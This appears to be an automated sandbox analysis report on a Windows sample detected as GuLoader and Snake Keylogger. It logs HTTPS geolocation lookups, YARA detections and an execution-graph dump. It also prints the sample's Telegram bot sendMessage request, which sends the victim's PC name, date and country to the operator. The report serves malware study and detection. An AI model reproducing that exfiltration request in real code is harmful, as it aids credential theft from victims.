                                                                                            2024-10-28 01:02:51 UTC87OUTGET /xml/155.94.241.188 HTTP/1.1
                                                                                            Host: reallyfreegeoip.org
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-28 01:02:51 UTC884INHTTP/1.1 200 OK
                                                                                            Date: Mon, 28 Oct 2024 01:02:51 GMT
                                                                                            Content-Type: text/xml
                                                                                            Content-Length: 358
                                                                                            Connection: close
                                                                                            apigw-requestid: AVhc-iOyPHcEJSw=
                                                                                            Cache-Control: max-age=86400
                                                                                            CF-Cache-Status: HIT
                                                                                            Age: 2
                                                                                            Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ryQ1Fz%2FTi%2FG7kOQW6g2CpsBR73nOwAg6e2xLD5eQwQBuQzNDgQJvprd%2ByNEVhJK35keK2oCb8lIDrdkybjm%2FajceI%2FKvSsE6wk%2B07JhAH6PknYhxLScy572PV0kGhzfoAETzstXN"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d9700b5d8f4839e-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1555&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1862379&cwnd=189&unsent_bytes=0&cid=e0f6c3dea934e903&ts=174&x=0"
                                                                                            2024-10-28 01:02:51 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                            Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.449744188.114.96.34437732C:\Users\user\Desktop\rFa24c148.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-28 01:02:53 UTC63OUTGET /xml/155.94.241.188 HTTP/1.1
                                                                                            Host: reallyfreegeoip.org
                                                                                            2024-10-28 01:02:53 UTC882INHTTP/1.1 200 OK
                                                                                            Date: Mon, 28 Oct 2024 01:02:53 GMT
                                                                                            Content-Type: text/xml
                                                                                            Content-Length: 358
                                                                                            Connection: close
                                                                                            apigw-requestid: AVhc-iOyPHcEJSw=
                                                                                            Cache-Control: max-age=86400
                                                                                            CF-Cache-Status: HIT
                                                                                            Age: 4
                                                                                            Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uj4HHugt1Ju2XiRoKfteZO8p9H33rQnhATxaX2By5Dwk8WY7KetxsJIPQ58T9R1H%2BUl7tr9Q%2BxFn%2BVG1oHCKbYlH6NelsvuKetaqYN2n1Kduq3cREdvR0DJmRpO%2BLUPG80J%2F7csQ"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d9700c00ef9e94e-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1310&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2151560&cwnd=250&unsent_bytes=0&cid=fc51a02c58865f6e&ts=158&x=0"
                                                                                            2024-10-28 01:02:53 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                            Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            6192.168.2.449746188.114.96.34437732C:\Users\user\Desktop\rFa24c148.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-28 01:02:55 UTC63OUTGET /xml/155.94.241.188 HTTP/1.1
                                                                                            Host: reallyfreegeoip.org
                                                                                            2024-10-28 01:02:55 UTC880INHTTP/1.1 200 OK
                                                                                            Date: Mon, 28 Oct 2024 01:02:55 GMT
                                                                                            Content-Type: text/xml
                                                                                            Content-Length: 358
                                                                                            Connection: close
                                                                                            apigw-requestid: AVhc-iOyPHcEJSw=
                                                                                            Cache-Control: max-age=86400
                                                                                            CF-Cache-Status: HIT
                                                                                            Age: 6
                                                                                            Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eQWlr%2FMpAtSQV7e9t81%2BkvELiCGHDfXhdrrIEAHwUrI2itQFGNE3eSU9G3iECiityIWknR9yd2uDa9%2F60Eb9iGZR6CQSOXa5h0CCIOhTOGD6IZCeDAHtwX1K%2BSgqqxLnJ17uW73W"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d9700ca4d7f2cb5-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1332&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2090974&cwnd=251&unsent_bytes=0&cid=423f5ce6143f049c&ts=195&x=0"
                                                                                            2024-10-28 01:02:55 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                            Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            7192.168.2.449749188.114.96.34437732C:\Users\user\Desktop\rFa24c148.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-28 01:02:56 UTC87OUTGET /xml/155.94.241.188 HTTP/1.1
                                                                                            Host: reallyfreegeoip.org
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-28 01:02:56 UTC876INHTTP/1.1 200 OK
                                                                                            Date: Mon, 28 Oct 2024 01:02:56 GMT
                                                                                            Content-Type: text/xml
                                                                                            Content-Length: 358
                                                                                            Connection: close
                                                                                            apigw-requestid: AVhc-iOyPHcEJSw=
                                                                                            Cache-Control: max-age=86400
                                                                                            CF-Cache-Status: HIT
                                                                                            Age: 7
                                                                                            Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nxtgLvKfVp2aUxfdfUSi%2Fe2hSj2XQr0sCgUhwctdVesCWc4vItDvh9oACtLgWvIrYZOr631OdcYYyKo3xJWKwxevE%2FwhQvmCvxaFJrCaECZgNvluaAwupKf3m396qVcg8LzHng4s"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d9700d48b933ac6-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1184&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2417362&cwnd=251&unsent_bytes=0&cid=85a3aa6a1c23f11d&ts=150&x=0"
                                                                                            2024-10-28 01:02:56 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                            Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            8192.168.2.449757188.114.96.34437732C:\Users\user\Desktop\rFa24c148.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-28 01:02:58 UTC87OUTGET /xml/155.94.241.188 HTTP/1.1
                                                                                            Host: reallyfreegeoip.org
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-28 01:02:58 UTC880INHTTP/1.1 200 OK
                                                                                            Date: Mon, 28 Oct 2024 01:02:58 GMT
                                                                                            Content-Type: text/xml
                                                                                            Content-Length: 358
                                                                                            Connection: close
                                                                                            apigw-requestid: AVhc-iOyPHcEJSw=
                                                                                            Cache-Control: max-age=86400
                                                                                            CF-Cache-Status: HIT
                                                                                            Age: 9
                                                                                            Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OgF3Vu9tyG433zhSGH1NGxOT7CQBteA9WaMll4tgZVb9yk%2FhBGvY1KTlSMdGcxZFV97IVZidjSveuqlu3LxvYslkzUYCM1jQ5H3OHMz2yJhF%2FwHK4T1LSM%2BDHpKGAUvUinlsyJV%2B"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d9700de9a3d4871-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1306&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2343042&cwnd=251&unsent_bytes=0&cid=b0fe6bf8c8ab4758&ts=189&x=0"
                                                                                            2024-10-28 01:02:58 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                            Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            9192.168.2.449769188.114.96.34437732C:\Users\user\Desktop\rFa24c148.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-28 01:02:59 UTC63OUTGET /xml/155.94.241.188 HTTP/1.1
                                                                                            Host: reallyfreegeoip.org
                                                                                            2024-10-28 01:03:00 UTC881INHTTP/1.1 200 OK
                                                                                            Date: Mon, 28 Oct 2024 01:03:00 GMT
                                                                                            Content-Type: text/xml
                                                                                            Content-Length: 358
                                                                                            Connection: close
                                                                                            apigw-requestid: AVhc-iOyPHcEJSw=
                                                                                            Cache-Control: max-age=86400
                                                                                            CF-Cache-Status: HIT
                                                                                            Age: 11
                                                                                            Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qMFXLJ9%2B00M3UJiwnVlk75siPra4BmRrJJ7NzkYw%2Frd9TmRUYwn2cgB7z%2BaA5o5yBZB5FPF7VHnrVOu90ImtgaeeRqBo6qZhL8ijBQxtCjA6gXNBhP5tTPcYL%2BqRGomZY2RA3YB9"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d9700e8e96beadd-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1243&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2197268&cwnd=251&unsent_bytes=0&cid=a8d157872e9a2eda&ts=163&x=0"
                                                                                            2024-10-28 01:03:00 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                            Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            10192.168.2.449781188.114.96.34437732C:\Users\user\Desktop\rFa24c148.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-28 01:03:01 UTC63OUTGET /xml/155.94.241.188 HTTP/1.1
                                                                                            Host: reallyfreegeoip.org
                                                                                            2024-10-28 01:03:01 UTC877INHTTP/1.1 200 OK
                                                                                            Date: Mon, 28 Oct 2024 01:03:01 GMT
                                                                                            Content-Type: text/xml
                                                                                            Content-Length: 358
                                                                                            Connection: close
                                                                                            apigw-requestid: AVhc-iOyPHcEJSw=
                                                                                            Cache-Control: max-age=86400
                                                                                            CF-Cache-Status: HIT
                                                                                            Age: 12
                                                                                            Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TE5KuUS0TNhFJKW%2BFoZXEJCuxtQCKMbrTU2sB2ES8vtwNNjyv7TigigabNx33xYBpPS7Xt78NmUpwCE56E4PrN9eyxC2K6PKrlLPQzi7Squ%2Bu1lI0yr8pXHVg0I43558hBkhiAU9"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d9700f31fdf2e55-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1324&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2142011&cwnd=250&unsent_bytes=0&cid=3ed617659d956b09&ts=162&x=0"
                                                                                            2024-10-28 01:03:01 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                            Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            11192.168.2.449787149.154.167.2204437732C:\Users\user\Desktop\rFa24c148.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-28 01:03:02 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2028/10/2024%20/%2012:44:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                            Host: api.telegram.org
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-28 01:03:02 UTC344INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.18.0
                                                                                            Date: Mon, 28 Oct 2024 01:03:02 GMT
                                                                                            Content-Type: application/json
                                                                                            Content-Length: 55
                                                                                            Connection: close
                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                            2024-10-28 01:03:02 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                            Click to jump to process

                                                                                            Click to jump to process

                                                                                            Click to dive into process behavior distribution

                                                                                            Click to jump to process

                                                                                            Target ID:0
                                                                                            Start time:21:02:00
                                                                                            Start date:27/10/2024
                                                                                            Path:C:\Users\user\Desktop\rFa24c148.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\rFa24c148.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:1'005'202 bytes
                                                                                            MD5 hash:7644EBBF786053FFAF95DBE86B7DE5D4
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2061274960.00000000052E5000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:4
                                                                                            Start time:21:02:35
                                                                                            Start date:27/10/2024
                                                                                            Path:C:\Users\user\Desktop\rFa24c148.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\rFa24c148.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:1'005'202 bytes
                                                                                            MD5 hash:7644EBBF786053FFAF95DBE86B7DE5D4
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2993781136.0000000033547000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:false

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:20.1%
                                                                                              Dynamic/Decrypted Code Coverage:15%
                                                                                              Signature Coverage:18.2%
                                                                                              Total number of Nodes:1529
                                                                                              Total number of Limit Nodes:49
                                                                                              execution_graph 4988 10001000 4991 1000101b 4988->4991 4998 1000152e 4991->4998 4993 10001020 4994 10001024 4993->4994 4995 10001027 GlobalAlloc 4993->4995 4996 10001555 3 API calls 4994->4996 4995->4994 4997 10001019 4996->4997 4999 10001243 3 API calls 4998->4999 5001 10001534 4999->5001 5000 1000153a 5000->4993 5001->5000 5002 10001546 GlobalFree 5001->5002 5002->4993 5003 401d41 GetDC GetDeviceCaps 5004 402b1d 18 API calls 5003->5004 5005 401d5f MulDiv ReleaseDC 5004->5005 5006 402b1d 18 API calls 5005->5006 5007 401d7e 5006->5007 5008 405d99 18 API calls 5007->5008 5009 401db7 CreateFontIndirectW 5008->5009 5010 4024e8 5009->5010 5011 401a42 5012 402b1d 18 API calls 5011->5012 5013 401a48 5012->5013 5014 402b1d 18 API calls 5013->5014 5015 4019f0 5014->5015 5016 402746 5017 402741 5016->5017 5017->5016 5018 402756 FindNextFileW 5017->5018 5019 4027a8 5018->5019 5021 402761 5018->5021 5022 405d77 lstrcpynW 5019->5022 5022->5021 5023 401cc6 5024 402b1d 18 API calls 5023->5024 5025 401cd9 SetWindowLongW 5024->5025 5026 4029c7 5025->5026 4313 401dc7 4321 402b1d 4313->4321 4315 401dcd 4316 402b1d 18 API calls 4315->4316 4317 401dd6 4316->4317 4318 401de8 EnableWindow 4317->4318 4319 401ddd ShowWindow 4317->4319 4320 4029c7 4318->4320 4319->4320 4322 405d99 18 API calls 4321->4322 4323 402b31 4322->4323 4323->4315 4324 401bca 4325 402b1d 18 API calls 4324->4325 4326 401bd1 4325->4326 4327 402b1d 18 API calls 4326->4327 4328 401bdb 4327->4328 4329 401beb 4328->4329 4330 402b3a 18 API calls 4328->4330 4331 401bfb 4329->4331 4332 402b3a 18 API calls 4329->4332 4330->4329 4333 401c06 4331->4333 4334 401c4a 4331->4334 4332->4331 4336 402b1d 18 API calls 4333->4336 4335 402b3a 18 API calls 4334->4335 4337 401c4f 4335->4337 4338 401c0b 4336->4338 4339 402b3a 18 API calls 4337->4339 4340 402b1d 18 API calls 4338->4340 4342 401c58 FindWindowExW 4339->4342 4341 401c14 4340->4341 4343 401c3a SendMessageW 4341->4343 4344 401c1c SendMessageTimeoutW 4341->4344 4345 401c7a 4342->4345 4343->4345 4344->4345 4351 4014cb 4352 405021 25 API calls 4351->4352 4353 4014d2 4352->4353 5027 40194b 5028 402b1d 18 API calls 5027->5028 5029 401952 5028->5029 5030 402b1d 18 API calls 5029->5030 5031 40195c 5030->5031 5032 402b3a 18 API calls 5031->5032 5033 401965 5032->5033 5034 401979 lstrlenW 5033->5034 5039 4019b5 5033->5039 5035 401983 5034->5035 5035->5039 5040 405d77 lstrcpynW 5035->5040 5037 40199e 5038 4019ab lstrlenW 5037->5038 5037->5039 5038->5039 5040->5037 5041 4024cc 5042 402b3a 18 API calls 5041->5042 5043 4024d3 5042->5043 5046 4059e3 GetFileAttributesW CreateFileW 5043->5046 5045 4024df 5046->5045 5047 4063cc 5051 406250 5047->5051 5048 406bbb 5049 4062d1 GlobalFree 5050 4062da GlobalAlloc 5049->5050 5050->5048 5050->5051 5051->5048 5051->5049 5051->5050 5052 406351 GlobalAlloc 5051->5052 5053 406348 GlobalFree 5051->5053 5052->5048 5052->5051 5053->5052 4354 